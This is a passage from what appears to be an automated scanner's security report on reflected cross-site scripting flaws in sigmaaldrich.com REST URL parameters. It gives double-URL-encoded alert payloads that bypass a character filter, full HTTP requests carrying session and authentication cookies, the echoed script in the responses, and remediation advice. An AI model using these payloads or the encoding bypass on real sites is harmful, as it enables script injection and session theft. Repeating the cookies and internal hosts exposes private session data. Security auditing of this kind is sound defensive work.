Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc877c0%2522%253balert%25281%2529%252f%252f2f4ff129287/medialib/labware/labware-icons/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc877c0";alert(1)//2f4ff129287/medialib/labware/labware-icons/books-and-software","E404") ;
   </script>
...[SNIP]...

1.339. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82d37%2522%253balert%25281%2529%252f%252fc015318ee36 was submitted in the REST URL parameter 2. This input was echoed as 82d37";alert(1)//c015318ee36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib82d37%2522%253balert%25281%2529%252f%252fc015318ee36/labware/labware-icons/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:03 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib82d37";alert(1)//c015318ee36/labware/labware-icons/books-and-software","E404") ;
   </script>
...[SNIP]...

1.340. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d163%2522%253balert%25281%2529%252f%252f4421b1f2f32 was submitted in the REST URL parameter 3. This input was echoed as 2d163";alert(1)//4421b1f2f32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware2d163%2522%253balert%25281%2529%252f%252f4421b1f2f32/labware-icons/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:05 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware2d163";alert(1)//4421b1f2f32/labware-icons/books-and-software","E404") ;
   </script>
...[SNIP]...

1.341. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9d85%2522%253balert%25281%2529%252f%252f61a9fd1d838 was submitted in the REST URL parameter 4. This input was echoed as b9d85";alert(1)//61a9fd1d838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsb9d85%2522%253balert%25281%2529%252f%252f61a9fd1d838/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:07 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsb9d85";alert(1)//61a9fd1d838/books-and-software","E404") ;
   </script>
...[SNIP]...

1.342. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2da6%2522%253balert%25281%2529%252f%252f2dc33b618cd was submitted in the REST URL parameter 5. This input was echoed as f2da6";alert(1)//2dc33b618cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/books-and-softwaref2da6%2522%253balert%25281%2529%252f%252f2dc33b618cd HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:09 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/books-and-softwaref2da6";alert(1)//2dc33b618cd","E404") ;
   </script>
...[SNIP]...

1.343. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/bottles [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/bottles

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8977b%2522%253balert%25281%2529%252f%252f9f89e2c44cf was submitted in the REST URL parameter 1. This input was echoed as 8977b";alert(1)//9f89e2c44cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8977b%2522%253balert%25281%2529%252f%252f9f89e2c44cf/medialib/labware/labware-icons/bottles HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
